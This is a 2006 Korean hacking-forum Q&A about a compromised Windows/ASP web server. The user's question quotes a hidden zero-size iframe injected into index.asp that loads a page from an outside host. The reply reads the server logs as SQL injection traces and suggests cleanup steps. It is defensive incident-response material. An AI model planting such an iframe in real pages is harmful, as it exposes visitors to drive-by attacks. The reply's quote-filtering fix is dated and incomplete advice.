크래킹 피해

423,

10/22

멍멍

http://hackerschool.org

[re] 윈도우 웹서버 파일 변경(해킹)에 관한 문의입니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=240 [복사]

soarrr님 오랜만입니다.

Windows + ASP 계열의 웹서버는 대다수가 SQL Injection 취약점에 의하여
공격을 당합니다.

SQL Injection 공격은 "나 '와 같은 인용문자(quote)로 수행되기 때문에
로그에서 이 값을 기준으로 검색/분석을 해보시면 됩니다.

올려 주신 로그를 보면,

GET /alumni/search/search/index.asp |25|80040e14|열_이름_'region'이(가)_잘못되었습니다.
GET /gs/notice/view.asp seq=|25|80040e14|줄_1:_'='_근처의_구문이_잘못되었습니다.

와 같이 SQL Injection 공격 흔적이 남아있는 것을 볼 수 있습니다.
위처럼 SQL error가 출력되는 상황이라면 SQL Injection 공격에 이미 취약한
상태임을 알 수 있습니다.

크래킹 피해 후엔 서버를 재설치하는 것이 가장 좋으며, WEB 소스에 백도어가 추가
되지는 않았는지 특정 문자열(CreateObject, .Run)과 최근 날짜로 검색을 해보시기
바랍니다.

그리고 SQL Injection 취약점이 있는 소스는 ASP 커뮤니티 사이트 등을 참고하여
"나 '와 같은 인용문자를 필터링하도록 패치하셔야 합니다.

===============================================================================
>안녕하세요.. 오래간만입니다..
>잠시 활동하다 잠적해버리다 이렇게 염치없이 도움을 얻고자 돌아왔습니다..
>
>다름이 아니라.. windows 서버 2대가 index.asp 파일이 변경되었습니다..
>(<iframe src="http://kr.kr2cn.com/index.htm" width="0" height="0" frameborder="0"></iframe>) <- 삽입
>코드 제일 하단에 iframe 으로 코드가 삽입되었는데..
>변경날짜가 제각기 2005년 12월과 2006년 6월 경입니다..
>물론 사고는 최근에 발생한것으로 추정됩니다만..(아닐수도 있습니다..)
>
>우선 한 서버를 보면 알수없는 계정(s-1-5-21-1454055633-2705038733-166218806..) 이라고 index.asp 파일에 보안 정보에 계정이 추가되어있습니다..(win2003)
>다른 서버는 2000에는 없구요..
>
>각 각 파일이 생성돼었을 때 기준으로 로그를 첨부합니다..
>어떤 취약점으로 가능했는지 조언좀 부탁드리겠습니다..
>로그는 plaza.snu.ac.kr/~heeya/logs.zip 다운받으시면 됩니다..
>
>멍멍님 잘 지내셨죠?? ^^ 문안인사 드립니다..
===============================================================================

Hit : 6644 Date : 2006/09/27 03:33